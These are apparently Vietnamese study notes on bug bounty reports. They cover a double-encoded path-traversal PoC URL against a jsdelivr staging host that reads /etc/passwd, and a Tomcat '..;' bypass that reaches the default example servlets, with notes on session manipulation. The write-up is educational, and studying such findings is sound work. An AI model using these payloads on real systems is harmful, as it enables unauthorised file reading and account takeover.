Directory Traversal at http://staging.jsdelivr.net/ path-traversal

Attacker tìm thấy lỗ hổng path traversal thông qua PoC sau:

http://staging.jsdelivr.net//..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd

Decode lần đầu tiên:

http://staging.jsdelivr.net//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd

Decode lần thứ 2:

http://staging.jsdelivr.net//................/etc/passwd

Ký tự %c0%af đều là các ký tự không thể in ra được nên có thể chúng sẽ bị normalize và bị bỏ đi bởi server.‘

..; Bypass Leading to Tomcat Scripts path-traversal broken-access-control

Bằng cách sử dụng kỹ thuật ..;, attacker có thể bypass được cơ chế bảo vệ của Tomcat và truy cập vào các example/test scripts nằm ở thư mục /examples (là thư mục mặc định của Tomcat) trong môi trường test. Các file ở đó chứa rất nhiều example servletsJSP.

Cite

[ https://█████████/..;/examples/servlets/servlet/SessionExample] | Will lead to Session Manipulation and potential Account Takeover. Because the session is global this servlet poses a big security risk as an attacker can potentially become an administrator by manipulating its session.

[https://████████/..;/examples/servlets/servlet/CookieExample] | Insecure Cookie Handling

[https://████████/..;/examples/servlets/] | Source Code Disclosure and an “Execute” option

[https://███████/..;/examples/servlets/servlet/RequestHeaderExample] | Internal IP disclosure

Đặc biệt, file /examples/servlets/servlet/SessionExample cho phép thao túng session và có thể giúp cho attacker trở thành admin.

Testing LFI in Windows - How I (never) got a $30000 bounty